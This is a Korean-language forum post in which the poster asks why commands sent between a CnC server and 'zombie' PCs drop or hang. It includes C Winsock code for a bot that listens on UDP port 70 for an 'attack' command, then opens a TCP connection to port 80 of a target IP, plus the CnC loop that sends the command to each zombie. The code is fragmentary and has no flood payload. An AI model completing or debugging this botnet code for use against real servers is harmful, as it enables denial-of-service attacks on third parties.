<div>CnC 서버와 좀비 pc간의 통신에서 질문드리고싶은게있습니다.</div> <div><br /></div> <div>해커에서 명령을 보냈을때, 첫번째 명령은 drop되는데 두번째 명령은 drop이 안되더라구요</div> <div><br /></div> <div>어디가 문제인지 감이 안잡힙니다.</div> <div><br /></div> <div>코드 보여드릴게요.</div> <div><br /></div> <div>\\\\\</div> <div><br /></div> <div>Zombie</div> <div><br /></div> <div>DWORD WINAPI command(LPVOID){</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>int retval,strLen;</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKET recv_sock;</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>recv_sock = socket(AF_INET, SOCK_DGRAM, 0);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKADDR_IN servaddr;</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>ZeroMemory(&servaddr, sizeof(servaddr)); // 메모리의 값을 0을 초기화</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>servaddr.sin_family = AF_INET; // 고정, 다른값 사용X (PF_INET)</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>servaddr.sin_port = htons(70); // 좀비의 포트번호 </div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>servaddr.sin_addr.s_addr =htonl(INADDR_ANY); // 모든 ip에 개방</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKADDR_IN cncaddr;</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>retval =bind(recv_sock, (SOCKADDR *)&servaddr, sizeof(servaddr));//70번 포트 개방</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>if(retval == SOCKET_ERROR) return -1; //대기</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>int cncaddr_sz;//ip 사이즈담을 변수</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>cncaddr_sz=sizeof(cncaddr);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>while(1){</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>char cmd[30]="\0";</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>char *cmdptr1="";</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>char *cmdptr2="";</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span></div> <div><b><span class="Apple-tab-span" style="white-space: pre"> </span>strLen=recvfrom(recv_sock, cmd, sizeof(cmd), 0, (SOCKADDR*)&cncaddr, &cncaddr_sz);</b></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>MessageBox(NULL,cmd,"zombie- recv command",MB_OK);</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>cmd[strLen]='\0';</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>cmdptr1=strtok(cmd," \0");</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>cmdptr2=strtok(NULL," \0");</div> <div><br /></div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>if(strcmp(cmdptr1,"attack") ==0)</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>{</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>char a_success[40]="attack_command_recv_success";</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>strLen=sendto(recv_sock, a_success, strlen(a_success), 0, (SOCKADDR*)&cncaddr, sizeof(cncaddr));</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>MessageBox(NULL,a_success,"zombie_cnc_send_success",MB_OK);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKET wep_sock=socket(AF_INET,SOCK_STREAM,0);// tcp용 소켓 만드는것.</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKADDR_IN wep_addr;//구조체 변수 선언</div> <div><br /></div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>ZeroMemory(&wep_addr,sizeof(wep_addr));//무조건 초기화 하고사용</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>wep_addr.sin_family=AF_INET;//wep_addr 구조체 검색</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>wep_addr.sin_port=htons(80);//포트넘버</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>wep_addr.sin_addr.s_addr=inet_addr(cmdptr2);//double 구조체,#define INADDR_ANY 0 전처리기 활용</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>retval=connect(wep_sock,(SOCKADDR *)&wep_addr/*wep_addr의 정보를 sockaddr로 형변환*/,sizeof(wep_addr)); </div> <div><br /></div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>}</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>}</div> <div>}</div> <div><br /></div> <div><br /></div> <div><br /></div> <div>\\\\\\\\\\\\\\</div> <div><br /></div> <div>CnC</div> <div><br /></div> <div> <div>else if(strcmp(cmdptr1,"attack")==0)</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>{</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>//web server attack function</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKET udp_sock;</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>udp_sock = socket(AF_INET, SOCK_DGRAM, 0);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>//송신부</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>SOCKADDR_IN zom_addr;</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>ZeroMemory(&zom_addr, sizeof(zom_addr)); // 메모리의 값을 0을 초기화</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>zom_addr.sin_family = AF_INET; // 고정, 다른값 사용X (PF_INET)</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>zom_addr.sin_port = htons(70); // 서버의 포트번호</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>int strLen=0;</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>int zom_addr_sz;//ip 사이즈담을 변수</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>zom_addr_sz=sizeof(zom_addr);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>for(int i=0;i<count;i++){</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>zom_addr.sin_addr.s_addr=zlist[i]; // *좀비의 Ip주소*</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span><b>strLen=sendto(udp_sock, cp_cmd, strlen(cp_cmd), 0, (SOCKADDR*)&zom_addr, sizeof </b></div> <div><b><span class="Apple-tab-span" style="white-space: pre"> </span>(zom_addr));//attack command transmit</b></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>MessageBox(NULL,cp_cmd,"send command",MB_OK);</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>strLen=recvfrom(udp_sock, cmsg, sizeof(cmsg), 0</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>, (SOCKADDR*)&zom_addr, &zom_addr_sz); //transmitted success message</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>MessageBox(NULL,cmsg,"zom_cnc_recv_success",MB_OK);</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>text=send(client_sock,cmsg,strlen(cmsg),0);//after attack, send success message</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>MessageBox(NULL,cmsg,"cnc_hack_send_success",MB_OK);</div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>}</div> <div><br /></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span></div> <div><span class="Apple-tab-span" style="white-space: pre"> </span>}</div></div> <div><br /></div> <div>Cnc까지는 명령이 잘가는데 왜 drop이 되거나 대기상태일까요>?</div>
댓글 분란 또는 분쟁 때문에 전체 댓글이 블라인드 처리되었습니다.